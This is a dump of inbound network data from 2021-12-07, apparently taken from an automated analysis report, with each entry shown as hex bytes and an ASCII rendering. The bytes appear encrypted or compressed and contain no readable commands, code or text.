                                                                                              2021-12-07 12:39:07 UTC1414INData Raw: c8 a8 e1 d7 2d 26 76 f0 fe cb c5 86 37 b7 76 e7 47 09 96 53 6a bc f1 41 67 ee 4e 2c 9a f6 82 d7 d5 87 66 f3 7d cd bf 7e 47 a7 d2 ce 3f ce d7 bc c1 71 ab f4 6f d2 ee a8 30 9f ef 10 1a 44 94 ec 2f 42 da b3 d3 2d d2 db b5 68 0c ef 52 12 d1 ce dd d7 23 65 82 ce c9 2f 13 11 de 35 3c 95 4a 06 2f d7 0a f0 5f 7e a6 1d a6 32 3f 98 6c 3a 41 0d 0a 0f 27 fe 90 eb 70 49 8e fc 9a 9d de 63 2a 55 d9 c7 e7 e8 7e fb d4 41 b3 8f 45 d5 3c eb 15 35 3c 2c 79 c1 29 17 a0 8c 15 51 ff 79 6a 8b a4 74 90 3d 61 4e 9d 89 1d 35 7e d5 fb aa fe 1e eb 1d 4b dd 63 11 57 11 d6 ec ce d5 ab ff 63 b4 f0 72 c1 3b 09 f8 5f fd 0e 70 7e 5a ca 6b 10 fb 9e 9a 94 fa 7b f6 48 a1 c5 92 4c b6 93 3a 72 d8 bb 87 72 28 76 0d 1d 7f 65 16 16 32 81 ea fa 0c 8b d4 b8 80 f9 20 19 e9 b4 cd 44 11 3f 08 f4 5f 6f
                                                                                              Data Ascii: -&v7vGSjAgN,f}~G?qo0D/B-hR#e/5<J/_~2?l:A'pIc*U~AE<5<,y)Qyjt=aN5~KcWcr;_p~Zk{HL:rr(ve2 D?_o
                                                                                              2021-12-07 12:39:07 UTC1422INData Raw: 8c d0 bf 7c b1 b1 4e 9f cf eb 9f 13 c0 4b e1 03 bf 7f 9e 25 73 3f e8 9a ab 64 42 92 00 ff a7 54 a0 a2 47 b6 07 12 6e c9 3e 6f 50 6b 1a ef df 8d 18 bc 96 ed 08 59 b1 1d 34 9d 34 dd 93 02 3a f3 ef 6d 9f 41 1d 63 75 7b ba 56 e1 7d 10 0d 40 b6 e9 97 5d db fc b5 b0 38 cd 35 39 0e bd a1 92 72 8c e7 25 ec 4e e3 80 2d af c4 f1 87 42 26 14 34 03 ae 8d e9 a8 ea 6b fe 8f 35 1d 45 3b 74 32 a1 70 ef 1a 5e 6f 61 f6 2b ff ff bb e8 3b 1a 48 e6 76 bd f1 bc f4 7b 16 53 eb d2 83 06 42 d2 b4 ad a8 12 ef c0 8f 55 3c b3 9a 77 06 51 1b 2b 4b 3d d7 72 3d e4 c4 34 b4 56 15 a2 52 17 cc 5c a5 54 2d 85 cc 6e 9c 64 27 5b 02 83 4b 31 e6 94 e7 5b 90 c7 cd bd bb 66 74 b5 5f 41 fd 77 f0 40 68 89 7d 5f 69 03 fa df ae 46 50 ff 32 28 df 11 98 d0 58 40 ef 63 f0 38 a7 2d 2f 2d 4e 98 d7 37 18
                                                                                              Data Ascii: |NK%s?dBTGn>oPkY44:mAcu{V}@]859r%N-B&4k5E;t2p^oa+;Hv{SBU<wQ+K=r=4VR\T-nd'[K1[ft_Aw@h}_iFP2(X@c8-/-N7
                                                                                              2021-12-07 12:39:07 UTC1430INData Raw: 7b 6a c4 73 00 ff 65 f9 fc c8 da 03 2c 8b 0c a3 ec cf 1c 4c 44 9c 36 b4 ea c6 2c ce d6 65 3e 89 13 af ac 7b 8b 6c 77 e5 6d cd da 52 81 fd 97 b5 a3 b6 02 f2 fc cd 1b 6c 09 a3 90 cb a6 95 89 84 1d 81 d9 e2 db 6a be c3 ab 97 27 fc 3b de f3 b7 67 e9 8f 0d ea 9d 95 ba 33 a1 be ab 1e 09 f0 4e a1 c6 5a 18 d2 ec 73 c3 e2 1e a1 10 d6 65 46 c2 5b 44 92 ae 46 a5 2b ea 4a 14 4a 9e a9 3e f9 26 45 5f 93 05 2c 0b 87 e2 f7 6c af 44 e0 a9 28 59 19 ff 42 b6 4e 9d 41 5d cb 7b 49 2a 2e 4b 96 24 a4 a9 55 0c 52 a6 a3 1b 86 ea a8 6e 5f 12 d7 65 cc 2c d0 e4 c4 2c 81 fc 1b 84 8f 75 22 ab 36 80 ff 75 83 9d 8d f2 4b 0e f4 ff be ee 90 a8 6d 73 c9 e0 fc 11 73 77 6c fa be 3f df 54 27 58 6d 8d 13 bb 3d cb d4 7d 74 22 b3 57 ba 81 bd f3 86 48 d8 8f 74 c1 74 7a c8 b6 fd db a8 97 cd e7 d5
                                                                                              Data Ascii: {jse,LD6,e>{lwmRlj';g3NZseF[DF+JJ>&E_,lD(YBNA]{I*.K$URn_e,,u"6uKmsswl?T'Xm=}t"WHttz
                                                                                              2021-12-07 12:39:07 UTC1437INData Raw: 8d 47 b0 3d d9 a0 1c 6b 2b 22 48 e3 07 b1 e5 6b 24 c3 d5 ed f0 d2 1e be 13 59 55 56 a0 79 7a af 40 d7 ab be 5f 16 20 62 c6 84 04 fc 23 f5 9e 50 16 c3 3d 63 a8 2a c8 46 dc 38 86 17 ed cc 16 16 a3 a6 d9 a6 b5 ba a6 31 fe 03 c6 11 6d bc 16 4f d4 47 36 92 61 2f 44 53 55 4f 9d 92 5c ae ca 6e a3 2f 47 08 d6 3f 97 a8 5a ee 1f e8 37 54 7f 56 a1 8a 7c 64 33 74 0b 4e f6 6f 69 69 91 67 05 fc 17 36 54 d5 2d f6 72 d4 8e 42 99 4d 86 b4 36 81 0b 1f 1a 81 23 62 3a d1 7d 76 43 9a ca 0b 28 6f 64 84 7e 33 8a 07 6a 7b 9e 8c 86 43 e1 ed fd 2c 67 17 b8 3e 90 7f ad 18 a8 77 f4 72 d3 a5 14 df 87 fc 9e a5 b2 05 d4 3f 68 1d 43 7c ea a4 43 98 9d 7d 71 75 52 f8 24 9a e1 50 69 77 c5 30 2a e4 8b 20 ff 06 69 4f 1b d2 a1 68 7c e7 a5 7d a1 88 b7 40 76 ed 00 82 d3 5c f7 4b 2c b8 ff 6f 83
                                                                                              Data Ascii: G=k+"Hk$YUVyz@_ b#P=c*F81mOG6a/DSUO\n/G?Z7TV|d3tNoiig6T-rBM6#b:}vC(od~3j{C,g>wr?hC|C}quR$Piw0* iOh|}@v\K,o
                                                                                              2021-12-07 12:39:07 UTC1445INData Raw: c7 71 9a 5c 9e 3f 0b d4 3f 8a b3 e3 4a 1d 6b 68 ef be 04 5b a5 2b bd 38 8d 1c 59 73 7f 2e 7e e3 c9 c6 de aa e7 b3 d0 6f 4d 34 3f a0 c7 aa 08 fa 1f a9 2e 3c c9 07 82 a8 2d dc 6e f5 95 d0 99 b7 10 a8 83 e5 5f 0e 1f c7 0a 4c 51 ea 50 5f e7 df 7d ca 51 ca 56 8f d8 17 87 86 a9 20 ff 4d 12 41 5f fc 31 51 71 81 65 6e d1 fc 59 a6 d9 18 27 19 ec bf c8 ab 10 b3 f3 e4 4c f7 50 86 8a 8d a6 b9 44 e8 1c 8c 23 a3 39 4e ed 73 90 df d2 94 3c 93 f7 42 88 9e ca f0 9d 88 69 5a 51 4d 72 30 2a e4 0d ef 26 af 7b 23 49 ae 6d 78 b2 09 fb 5f 4d 43 b4 3a e3 03 ff cb c8 0c 83 ed 4e bd 70 62 dc cf ea e8 62 05 89 7d 1a ba 97 1c 5b 18 57 ed 59 f9 db 08 90 7f ab ee 88 e6 41 52 5b ff 6d c6 a0 ed 06 26 92 86 41 73 95 44 99 e6 98 c4 88 17 a5 0b e4 9f 23 23 9a 31 81 e7 0f f8 ef 3f 1c 65 15
                                                                                              Data Ascii: q\??Jkh[+8Ys.~oM4?.<-n_LQP_}QV MA_1QqenY'LPD#9Ns<BiZQMr0*&{#Imx_MC:Npbb}[WYAR[m&AsD##1?e
                                                                                              2021-12-07 12:39:07 UTC1453INData Raw: 54 07 19 36 b1 65 4d ad 87 a5 78 ab 53 f2 67 fc 72 ff ac d1 61 8b fe 63 7f 6c 6e 91 c2 53 c4 9b f1 fa 07 ff d8 cf 6e a3 ee 39 4b b1 00 25 1a be e0 bd 59 c9 d4 2f 53 6c 84 d1 8a 1b e9 46 be 89 07 f7 bf e0 fd 3f 26 b0 ff 02 fa 8f 80 ff 06 f4 4f 96 96 5f bc b3 ed 05 fd 1f 04 dc 54 3a af 82 fd d7 8f 39 a2 8d c0 61 e8 2a b8 ff a6 d5 50 15 7d 41 13 bd ae 97 8c b2 25 53 e8 a4 6e 8d 51 ed 70 e0 93 25 cf e7 0d 8d 82 49 49 29 6e aa 1a bb 5a dd 41 3b 13 2c 88 f7 55 a1 cf 34 d5 df 99 bb 74 fb 5e 9b 03 17 1a f0 86 42 23 0a d4 ec 48 f5 43 37 d9 65 60 2d 3d 6a ba f9 f3 ef 8a 3e 28 a8 e7 22 a2 21 b7 f8 a7 78 51 ad fc b5 b1 86 eb 91 46 98 fb c6 bf f8 37 f0 fb 2c 92 ec db fd d1 c7 96 ae be 11 04 5b 70 db 68 af 5b fc 43 5b d3 dd e4 c6 a7 b2 ce a6 10 ab 7e 34 81 ef 27 07 c5
                                                                                              Data Ascii: T6eMxSgraclnSn9K%Y/SlF?&O_T:9a*P}A%SnQp%II)nZA;,U4t^B#HC7e`-=j>("!xQF7,[ph[C[~4'
                                                                                              2021-12-07 12:39:07 UTC1461INData Raw: 9a 4e 6f 9f 6e 2f 75 5c f3 7e fb 53 f2 b0 de cf c7 6c f1 97 25 ff b7 3b a2 ed 75 98 fe 1a da af 1e 7e 7b ca 4c 95 ff fd 90 a9 8a b6 d6 d0 51 63 10 cb 9b bc 70 f6 75 5c 9f e0 92 db 6b ef ac 20 1f 0a d7 d5 67 3d 54 23 a1 5b 7e 2e 98 57 d8 c7 cc 61 12 c9 08 12 1f 2f 42 d4 1e f6 95 eb 01 1c 67 d1 c1 2b 3c b9 51 85 ee 42 ba 75 f9 e4 59 f2 93 42 7a 44 bc f8 c0 80 b1 17 54 ba 63 f8 4c 19 f3 0e 5a 45 f0 9b b1 ef 82 db 70 77 7e 0b 31 db d7 b4 ef 1e 92 a0 24 27 68 7f 52 89 7b fc 87 89 02 8f 65 99 f9 8d 68 98 ce b7 1d 11 89 82 51 5e 95 d4 aa d7 0b ae cc dc 0f 84 a5 19 83 d5 6a 9f bb 25 85 14 a1 d5 53 14 10 5b 05 b9 b3 bd 78 05 db 97 3b 0d a1 c9 b5 df be b0 96 c5 a7 5b 9d 72 84 96 26 a1 30 7c 2c e3 f7 bd 3f 36 eb 51 d0 fc b3 f2 04 7e a1 ec 8a 25 e1 d6 d4 3b 2d 54 9b
                                                                                              Data Ascii: Non/u\~Sl%;u~{LQcpu\k g=T#[~.Wa/Bg+<QBuYBzDTcLZEpw~1$'hR{ehQ^j%S[x;[r&0|,?6Q~%;-T
                                                                                              2021-12-07 12:39:07 UTC1469INData Raw: c1 13 d5 fd 7f 39 65 b4 02 fb 97 09 9a 93 85 39 20 8e ad f3 af 03 36 0c ed a7 b1 79 aa 03 46 81 fe 89 68 d2 e5 4c 0e e0 3f 90 f6 57 07 c6 84 cb 28 85 4c 4a 02 10 01 57 c2 f2 f9 06 0f de c0 70 5d c9 5f ec b1 03 fe 57 b4 27 5d 54 9c a5 4a 35 0e 0f 24 ec ed a5 9b 16 36 6e 85 a6 80 11 34 ce c4 ff 3c e5 fd 7a e8 1d 41 42 dd 87 70 2a dd 3f 1d 47 4d 11 52 83 b9 81 3f 38 d6 62 1a 05 73 a3 08 9f 69 b6 3a 46 8c 88 6b 94 b9 3f 06 f7 3f be 4a 4c a0 fe 89 e2 b5 6b 28 8e f2 25 d5 03 fb 01 ff 49 11 0a 51 ce 98 2f a1 5d 93 4e e9 41 01 fc af 71 3b 4f c0 ff b8 e5 ff 7d 95 ce 05 f8 57 ac b9 82 9c 7f 9e e8 74 c4 8c 70 ed 58 93 fc ae 65 b7 49 41 35 d5 01 fc 0f 13 3d 59 46 24 ff 03 d4 7f 47 69 52 5d e3 f3 9f d1 c1 71 1c 2b ce a2 98 eb 70 87 6b c6 ff f0 3f 2c 97 c5 5b 92 85 71
                                                                                              Data Ascii: 9e9 6yFhL?W(LJWp]_W']TJ5$6n4<zABp*?GMR?8bsi:Fk??JLk(%IQ/]NAq;O}WtpXeIA5=YF$GiR]q+pk?,[q
                                                                                              2021-12-07 12:39:07 UTC1477INData Raw: 82 f8 96 15 ac 21 3c 29 6e 8f f9 36 8b b8 63 2b b8 6e 77 e6 37 49 01 2d 91 c9 5f 95 c9 84 d4 f8 96 ba a9 c6 3e 43 95 56 07 96 21 4a 57 9b 30 07 64 fc 1b 13 c8 a0 ce 54 f5 84 3f 27 91 f9 9e 0a d5 d9 11 9f 8d 1f 61 9a 70 1c c6 86 c9 d8 e9 8b 62 73 7d d3 33 74 4d 82 7d 16 d3 25 d5 4b 57 7e cc 95 a8 21 33 42 7d 02 58 7c 78 e2 7f 50 31 cd 89 18 8b 7b 9e e4 3a 94 e1 6c 92 64 75 7f c8 cd eb 9a 4e 7b e5 ba 25 c7 79 31 68 09 e6 5f d2 de d1 ae 65 16 15 17 d4 c0 a0 3b 47 ae f9 92 af 01 fe 3b 34 c6 ba 7e b1 7e 50 77 2c 37 80 11 d0 ad 42 ef 9a dd df 2b d4 d0 a8 9b 97 47 ef 11 8f be cc 5f 34 38 3f ae 8c e9 a1 87 f4 bf e8 1b 25 74 39 1b 88 2b 8a 45 28 33 a5 57 39 c5 31 b5 81 4d f1 56 a9 09 35 7a 53 18 b2 ff 59 34 63 4d eb a2 bb c8 89 f1 5b a2 28 c2 1a a2 d6 45 2c af 0c
                                                                                              Data Ascii: !<)n6c+nw7I-_>CV!JW0dT?'apbs}3tM}%KW~!3B}X|xP1{:lduN{%y1h_e;G;4~~Pw,7B+G_48?%t9+E(3W91MV5zSY4cM[(E,
                                                                                              2021-12-07 12:39:07 UTC1484INData Raw: c2 34 12 a2 55 2b cb dc 3d fa 95 e7 19 29 49 fc b0 ce 5d 7f e4 fb 87 12 e0 3f b0 3f 3f 80 6c 2d bb 2e 21 fb df 56 68 04 ee a7 57 f4 ab dc fd 76 f7 bc 51 fa 9f 2d 97 26 35 2d 61 b3 e0 fd c3 28 ad 5f 70 05 e0 27 89 77 54 41 fe 7f e4 ff 92 4c 86 7f ee 5e a6 d9 2e 2f 9a 7d 40 51 7c b2 04 e0 7f 55 26 b5 3c b0 1f e7 f8 10 e9 d8 97 69 99 7b 89 7f fc 71 65 cf 3d 57 18 4b 41 a4 ca 15 8f c8 ca a7 5a 83 07 f4 bf 71 2d cc 1a ac 70 79 cc 50 85 3a 9c a0 42 a6 8f 5a 14 5c d3 3c cd 62 de 39 46 8c b8 38 cc c0 fe f8 fd be 9d 16 2c 13 73 17 30 4c ce cd 2b e0 78 f2 a2 29 1f dd 5e 5f 2b aa 28 2b 5e 64 38 17 64 7d dc 7e e0 23 c6 60 cc ff da 8d ee 49 1e 95 52 5c af fc 5e d7 2c 64 3c 1b c9 ff 6f 51 60 aa 0d 7e de 6d f0 b5 6e ee 90 94 49 a7 46 f6 7f 88 da ae 90 ca d4 de 8b 26 d1
                                                                                              Data Ascii: 4U+=)I]???l-.!VhWvQ-&5-a(_p'wTAL^./}@Q|U&<i{qe=WKAZq-pyP:BZ\<b9F8,s0L+x)^_+(+^d8d}~#`IR\^,d<oQ`~mnIF&
                                                                                              2021-12-07 12:39:07 UTC1492INData Raw: 89 9b 71 c7 a5 45 0b dc a1 ba e1 d7 13 e7 8d ee e1 6e 28 2b 75 f9 c5 80 ff df 03 b8 38 fa 5b db 11 f7 a6 0e 6b a2 7e 08 cf ed 66 49 9c 33 d2 1e a6 a7 98 37 0d bd e0 83 9f 89 cc 7f ac 4e 34 b5 97 66 21 5f be 11 e8 73 ae ea 70 f1 cb 92 2f 69 dd 34 4e 38 a5 e6 a8 69 5f b4 65 34 82 5e f6 01 f6 1f cb e8 80 9c 34 d5 1a fa 27 b8 82 fb 27 83 aa 7e 64 66 64 77 ae 29 bc 96 d0 49 16 00 f9 bf 51 ed 44 aa 30 d7 9e 10 dd f7 2b d3 e7 7c 88 bf 1a a7 c9 dc f3 3e f7 3d 4f 1a f2 68 da cb 58 34 e4 79 c7 88 a8 f8 81 9e 2d 4b 42 ef f7 76 05 5f c8 07 89 ed 0a d1 f6 17 b2 df ba e7 1d 44 c7 25 a6 76 b5 f1 7f f9 6a ea 29 76 e4 fa c8 0d 9f a5 4d bc 87 13 51 ee 4e 72 eb a8 5e f8 d0 55 b7 40 8b bc e9 07 a7 0d eb 79 e6 44 b5 78 d9 bb b9 cd a9 f2 e8 68 77 f0 1e 04 fa 31 b6 33 65 90 c6
                                                                                              Data Ascii: qEn(+u8[k~fI37N4f!_sp/i4N8i_e4^4''~dfdw)IQD0+|>=OhX4y-KBv_D%vj)vMQNr^U@yDxhw13e
                                                                                              2021-12-07 12:39:07 UTC1500INData Raw: 8c 3e 5c 49 f9 b0 4f cc 9d 1f 97 96 82 92 de 9e 08 25 3b 02 fc 69 83 df 69 22 b7 de a4 7a 71 39 5d 70 6c 1f b1 73 c5 ac 64 53 6e 94 bf 4e c9 7c 69 fb 20 53 1f d7 2e fc b2 e4 0f e7 97 18 30 7d 81 4b 35 1d 4f 06 9a f4 fb 47 26 90 f8 ed fa 2d eb ab ef 2c 86 a6 da 68 ba df 74 73 87 ad e2 3c f3 69 3e c8 3c 4c a2 8b 1b ce 0a e5 cf 83 72 5d 66 4f 22 b3 45 c6 ff db 6a a4 ff ab 52 53 23 f1 47 71 97 eb 2d 45 4b 8d 83 fa 5f 25 2b 34 aa e0 bd 50 1b 50 e2 7c 64 2e 6e d7 d6 4a d8 7e 7e 3a f0 a3 d7 8b 91 5f f3 8f b7 c7 4f fb ff c1 ff cb ff 23 61 c2 07 0c 9a 04 1f 6d 38 0b 47 90 f8 43 41 fe e3 03 f9 af 12 c5 7f fe dc 7f 45 ea 1f e5 de ea 86 27 dc f9 77 fe e3 2a 6f 47 f2 df 18 1b 0c b6 20 fe d9 7c 5f 6b a0 4d 7a 29 1e 36 c4 0e 19 08 7f 01 fd 9f 3b 35 67 2d e8 7f 88 5c a0
                                                                                              Data Ascii: >\IO%;ii"zq9]plsdSnN|i S.0}K5OG&-,hts<i><Lr]fO"EjRS#Gq-EK_%+4PP|d.nJ~~:_O#am8GCAE'w*oG |_kMz)6;5g-\
                                                                                              2021-12-07 12:39:07 UTC1508INData Raw: cc 85 e4 51 29 5b 7b df 68 7d 75 76 14 bd 02 e5 eb 4d 8e 02 6b 28 29 a4 dd 38 24 60 5e f9 b7 fd 9b 84 82 79 ae 0e 53 06 e6 40 5f cf 94 5c 17 ca e8 e6 a7 83 b1 49 76 79 d3 f5 8f 6f ca 27 df 42 e0 77 b5 1f 29 14 8e fb 35 c9 8c 1d 7d a4 a8 98 b4 78 da e4 17 e9 10 2c fd db fe 17 ea 6a 5f d3 8e 51 58 d2 68 54 8f e1 07 62 1f 6f f5 7c a5 3d 6d bb e4 3d 24 85 28 56 79 4f 60 1c 0c b7 09 f7 cc 1a d6 dc 5b e2 c2 59 c3 c6 80 b2 0f f3 92 ff db ff b3 a4 b5 e8 9f 40 71 e4 5d db d3 7c 38 2f 24 c3 5e 72 5f af 7a c7 11 ba 49 49 29 81 30 dd 8d 87 bc b0 2a 2a 9b 5c 83 d0 96 f9 a0 e3 a1 85 b6 b5 fc 27 ff ef bb 4c 2e 70 4e 60 4a 7e f7 ae 3f 73 24 cd 40 78 f5 0a 9f cb e1 f9 3e 36 1f b2 f1 7a 9d 83 f5 d7 76 8c d4 f9 85 d7 e2 4d ff 4f fb 4f cb 2c f8 e4 4f 04 bc 4d d4 fc 88 0a 32
                                                                                              Data Ascii: Q)[{h}uvMk()8$`^yS@_\Ivyo'Bw)5}x,j_QXhTbo|=m=$(VyO`[Y@q]|8/$^r_zII)0**\'L.pN`J~?s$@x>6zvMOO,OM2
                                                                                              2021-12-07 12:39:07 UTC1516INData Raw: 3b 39 b1 d5 c1 f5 cc fa 44 05 c1 bd f5 5e 6c de 7c 69 ef f1 7a 5a 94 45 dc 7a 6b fc 7f e4 c3 6c 8d 9f 28 14 a9 42 0a 45 9f 90 39 fd c0 3a 36 f0 5f 38 ba 14 65 19 b2 1c e4 17 78 d5 a8 7a 3a a4 a7 3a fa 54 e7 5b 9c 07 bb 8e f5 f0 21 31 9c bf f8 ee d0 cb de d2 be 18 9c 4f 1a f1 29 dd a1 39 54 07 49 02 83 bc d0 60 32 46 ca f6 d5 e9 2b 95 d3 1a 3d a9 96 c1 f4 97 6a 29 d2 a0 0f b9 60 4e 27 0f a7 32 db be 7c 61 8a e7 76 2d c0 63 7c 72 85 a1 a4 e2 f1 85 be e5 c7 77 2d e7 84 38 78 24 33 08 6d a3 89 6a 4e 1c c3 04 71 06 fc 8f 05 fa 7c 35 76 ee dd 1a d2 f1 f9 0e c1 ee d9 7d 6d e7 96 c6 e5 da 6f ad f4 d6 c4 5c 3a 63 23 b9 3f 2e 66 d4 22 9f 7b c4 56 b4 44 6d cd dc f5 b2 f4 c4 bd 6c 88 f3 4c 25 7e 3a 09 be d1 35 39 63 32 6b b1 ea 83 b6 a2 82 4c 9b 07 4f d2 ac e9 46 fd
                                                                                              Data Ascii: ;9D^l|izZEzkl(BE9:6_8exz::T[!1O)9TI`2F+=j)`N'2|av-c|rw-8x$3mjNq|5v}mo\:c#?.f"{VDmlL%~:59c2kLOF
                                                                                              2021-12-07 12:39:07 UTC1523INData Raw: 48 62 bf f1 49 c9 b3 49 b0 4d 41 18 d2 a3 ba 93 d5 f4 b7 31 9e 60 57 c3 52 34 11 8c 50 dd 3e 33 a3 b4 2f 1c 36 a2 ef 1d 1e 62 ae 06 35 32 c6 36 b5 f4 d0 d7 d0 3d 0c 19 d6 e7 72 c1 18 b7 2d 07 d9 b5 fc ac b5 15 b3 8e d6 59 96 98 bc a4 37 4a cc 45 36 41 e9 68 11 74 f0 e5 b7 05 ff 6b 8b 72 d0 e4 20 f5 f9 8e d4 9d c0 b7 6f 33 b5 2a bf 9e b3 d0 68 ad 1e 2c 2d 44 e0 2e 1e 64 6a 97 7d bf 2a a2 03 fe 67 77 b9 5c 54 da 3e 37 df 5f 5d 59 d9 da a7 10 f5 34 d8 90 3b 12 47 65 8e af 7e 9c 54 04 1a e2 d6 c0 09 92 75 a3 35 5c d2 41 70 74 e4 b5 fe 4b 82 54 7f 91 69 3e cd 39 42 e8 da d4 0e c8 aa 23 e7 f4 e1 a9 ad 97 de 87 f6 25 12 22 cb 15 23 6b 73 54 4c 85 cb f8 3d af 41 50 aa d3 52 25 f8 ca 6c 89 f1 fd 74 9b af f8 cf d1 2d 5f 00 76 ec a7 89 28 81 af 24 e4 2b 93 31 ae e5
                                                                                              Data Ascii: HbIIMA1`WR4P>3/6b526=r-Y7JE6Ahtkr o3*h,-D.dj}*gw\T>7_]Y4;Ge~Tu5\AptKTi>9B#%"#ksTL=APR%lt-_v($+1
                                                                                              2021-12-07 12:39:07 UTC1531INData Raw: ca e6 0c d9 fa af 5d 4d 21 df dc cd 65 fb 68 01 ff a3 44 53 9c 38 14 0c 00 ff d4 25 30 b5 53 9b a1 02 de ff 9e c2 64 37 52 0f 32 e8 b1 e8 e2 ae de 6f 42 6c 9d 61 69 6b eb b5 30 19 dc 27 26 d1 ed ea 19 0f a8 91 e9 ab 35 76 f1 a5 72 43 52 72 db 6e 8f a0 6a 44 b7 5f 77 16 2c 9c 85 92 e2 f3 a3 27 27 b4 cd 8c c5 69 b3 2f ff 90 45 61 3d 54 32 4d 29 e4 56 1c ef 2a 4a 8c 31 97 d7 df c7 00 fc c3 dd 24 01 c0 7f f3 01 fe 5b 99 b1 fc 80 dc 6e 0d 93 ea 1d c6 69 71 c2 7f ff df e8 a3 c4 f2 7d 49 0d c9 ce ec 59 bc 41 17 69 48 04 ec fd 10 46 ef 6a 29 2c 3d fe e9 92 81 ab eb 1b 46 dc cf 6a a0 ff f3 dd 14 49 15 3e 63 b1 dc 04 d6 ff 5e f6 a9 63 00 ee d7 13 9d 7b d8 44 98 81 55 85 54 16 b5 3f a4 c1 da be 1e 0e 58 1e 3e 9f c6 7e 11 bb f7 7d fe 05 24 5c 9a 36 9f b2 d0 7e d8 38
                                                                                              Data Ascii: ]M!ehDS8%0Sd7R2oBlaik0'&5vrCRrnjD_w,''i/Ea=T2M)V*J1$[niq}IYAiHFj),=FjI>c^c{DUT?X>~}$\6~8
                                                                                              2021-12-07 12:39:07 UTC1539INData Raw: 41 4f 21 92 94 66 e8 ce 53 82 47 a0 72 b2 bd 0e b5 bd fd 3e 8f 22 f4 8e c0 5c 07 9e 33 49 f2 bb 20 f2 81 82 4f 9d da 35 d2 74 93 5c 09 f9 87 ff c7 03 89 81 a2 06 99 4b a1 4e 59 79 12 05 33 63 2a 64 c5 bb ed 21 02 69 63 56 b3 37 92 22 6a 09 62 53 6e 69 ac a7 73 c5 75 53 de 81 ae 8a b3 da 74 a3 13 2a c1 66 b7 45 b8 67 ab c7 77 80 ff f5 d2 4a b8 f6 3c 9f 0d 12 ca 1c fa dc 3c d4 23 36 6e 62 d8 f2 12 54 61 0f 01 f4 3f eb fa 4a d9 7b 60 1d 25 e3 91 7b 25 ce bd ac 00 ff f9 d2 57 26 da 38 2b 0d 4c 7c 49 a3 2f bb b1 0b 2c 09 bd 29 04 61 c5 0c b3 7b 18 f0 bf e1 7d f9 c8 7f a9 7c ff 7b fa 3f fc af 74 e9 0f fe 57 5d 9a 94 b1 0f bd 92 f2 f4 f2 d2 bf cf d2 f9 44 97 3f 01 fe ef 58 be 99 af f8 ea 6f 01 09 3e 20 7c 15 c0 3f 95 08 5c 75 01 fc 3b ef 04 29 85 85 ae c2 e2 a9
                                                                                              Data Ascii: AO!fSGr>"\3I O5t\KNYy3c*d!icV7"jbSnisuSt*fEgwJ<<#6nbTa?J{`%{%W&8+L|I/,)a{}|{?tW]D?Xo> |?\u;)
                                                                                              2021-12-07 12:39:07 UTC1547INData Raw: 4c 96 30 85 2a 01 d0 7f 39 c8 eb bf fc 0b b7 6e 0a 44 3a 19 0c b1 62 40 f9 f0 ff 40 5b 01 f3 22 1c 93 42 e0 f5 1a 6d 58 62 c2 f0 ee 3a 2a 43 16 75 f7 dd ad 35 c7 ec 1e fc 0e 3e f7 bf fc 5f 75 e1 95 4a ff f3 7f 85 c8 8a 00 f2 5f 52 c4 ec fa 80 fc 97 d3 e7 6b 92 c8 82 96 df 6d 23 33 8e d2 68 f8 b4 82 1f fa af 0a 16 58 5d 83 15 35 a0 fe 6b f7 a5 93 02 fc df 83 18 79 bf 1d fa f1 03 fc 8f 04 ad 5a 95 3d 6a 47 f8 85 c6 52 cb f3 90 d2 81 bc ff ed 7f bc da 6f ad 7d 6a ad aa ed 39 8b 04 e8 1f 08 a9 8f 29 71 d6 99 c8 da d1 6d ea 6a 57 6e 50 d5 bc d9 4e 8b 24 07 17 b4 5c f4 00 ff 9b 49 fa e2 03 bc f6 12 df 5e d3 f5 ff ea ff ff ad ff 6d 31 c9 b6 02 f2 7f b6 63 5e aa 5c 74 b6 8b e6 b3 32 a5 f5 bf 34 0c ef 06 b5 a5 03 f8 47 aa 0d b9 a1 40 0a d9 7d 8e e8 e6 12 c2 bb 99
                                                                                              Data Ascii: L0*9nD:b@@["BmXb:*Cu5>_uJ_Rkm#3hX]5kyZ=jGRo}j9)qmjWnPN$\I^m1c^\t24G@}
                                                                                              2021-12-07 12:39:07 UTC1555INData Raw: 2a 53 35 d9 41 37 3b ff 34 45 9f a9 43 68 e9 78 dc a5 b9 48 44 47 24 42 b5 67 01 b7 82 7e c6 09 f8 ff 39 9a 35 7c e8 aa cc 2d be 2a 6a 89 b3 eb 6c 73 d6 d9 0f a0 fe fd d7 10 aa 7d f2 5d 7d 91 78 c0 72 1e c5 be ac 21 b9 bd 47 6c e5 37 69 5c aa 96 f6 1c 9f a5 e1 6e c9 3e d3 c6 8a 84 7b ef 1c 98 7f a2 1f 52 2e 12 a2 ca 11 4c 45 32 38 b0 20 4b f2 76 65 8b c9 6a d5 ea c5 97 bf 1a 59 b1 df 63 3c 33 2c 25 b2 e4 34 db 64 a6 28 67 42 52 de 14 14 40 e7 f1 0b 2f 19 94 b0 c8 dd 85 ce 7f b0 91 dc e6 f3 8e ec c2 63 d6 8a 5f b9 5b 3b 08 69 5c ff 69 93 56 5e 8d b1 26 69 fc eb b5 0e 2f 8e dc f6 f9 f7 ef 2f 20 ff 20 a1 c2 06 27 e3 4d 04 4f 84 40 c7 65 5d a9 ea 9f 7e 97 02 3f e9 a9 53 b6 ad 3c 56 a0 7f 60 b3 c0 b5 10 97 6e 1c da 73 70 45 15 de 9f 81 61 96 a3 2d 8e 04 fa 37
                                                                                              Data Ascii: *S5A7;4EChxHDG$Bg~95|-*jls}]}xr!Gl7i\n>{R.LE28 KvejYc<3,%4d(gBR@/c_[;i\iV^&i// 'MO@e]~?S<V`nspEa-7
                                                                                              2021-12-07 12:39:07 UTC1562INData Raw: 3f 15 7f 2a 10 97 7f 4d 0c 83 d1 fd 18 5f 8d 5e d6 85 5c 1c 49 69 9d 13 2b 94 2e 69 d6 a6 15 28 2a 53 3a 81 65 2a c9 3a 30 2c c3 d9 24 58 96 7f c9 92 d4 eb 88 8f 64 43 13 52 f7 8c d8 6c 37 0b ad ff c4 af a0 f5 1f 04 66 2b f3 6a 6f 01 b5 6d cb 50 21 8d e1 db 25 32 d3 cd 89 b5 bf d2 f7 4f 12 28 6f 24 48 79 55 ad 74 74 af ec 0c c5 24 0c a8 42 52 a5 1d 48 65 c1 fc b7 e8 de 4e c7 82 2f 71 b0 0f 1f 55 f9 6d 4b 34 2e c8 7f 15 dc 7f e0 38 c8 44 d4 95 7f 04 fe 8f 20 04 e8 f7 ef 3b e4 03 9e aa 25 38 bf e8 e4 04 f0 bf b6 db 48 3b bc a8 d8 62 2b 05 f5 2f b6 ba ef 4a c3 34 c6 f1 07 76 db a1 81 91 17 1e 48 52 